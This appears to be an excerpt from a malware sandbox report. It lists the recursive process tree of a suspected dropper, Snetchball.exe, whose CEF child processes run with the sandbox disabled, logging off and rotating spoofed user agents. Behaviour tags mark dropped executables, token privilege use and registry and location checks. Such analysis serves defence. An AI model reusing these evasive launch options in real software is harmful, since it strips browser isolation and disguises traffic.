C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2860 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2940 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3140 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3608 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 OPT/4.7.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3652 --field-trial-handle=2904,i,7382269448018808600,10825075855582038115,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
- Executes dropped EXE
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:210⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3176 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3436 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:810⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3456 --field-trial-handle=2880,i,4599515284367910489,2277805141044131385,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2856 --field-trial-handle=2860,i,11375972926962172299,16804764234097591245,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:213⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3020 --field-trial-handle=2860,i,11375972926962172299,16804764234097591245,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3184 --field-trial-handle=2860,i,11375972926962172299,16804764234097591245,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3652 --field-trial-handle=2860,i,11375972926962172299,16804764234097591245,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- Checks computer location settings
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; 22101316G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3684 --field-trial-handle=2860,i,11375972926962172299,16804764234097591245,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- Checks computer location settings
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2892 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:216⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3316 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3644 --field-trial-handle=2896,i,16940211616307338609,14972543307505011645,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2896 --field-trial-handle=2908,i,7298964317175947129,8887907790765618482,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:218⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3164 --field-trial-handle=2908,i,7298964317175947129,8887907790765618482,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:818⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3192 --field-trial-handle=2908,i,7298964317175947129,8887907790765618482,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:818⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3692 --field-trial-handle=2908,i,7298964317175947129,8887907790765618482,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:118⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3696 --field-trial-handle=2908,i,7298964317175947129,8887907790765618482,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:118⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"19⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2868 --field-trial-handle=2872,i,7684417757081257474,15185190239867450152,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:221⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3168 --field-trial-handle=2872,i,7684417757081257474,15185190239867450152,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:821⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3672 --field-trial-handle=2872,i,7684417757081257474,15185190239867450152,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:821⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3680 --field-trial-handle=2872,i,7684417757081257474,15185190239867450152,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:121⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3688 --field-trial-handle=2872,i,7684417757081257474,15185190239867450152,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:121⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
- Checks computer location settings
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2844 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:224⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3136 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3096 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3652 --field-trial-handle=2848,i,12180143956683332525,14853235146756958687,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"25⤵
- Checks computer location settings
- Modifies Control Panel
-
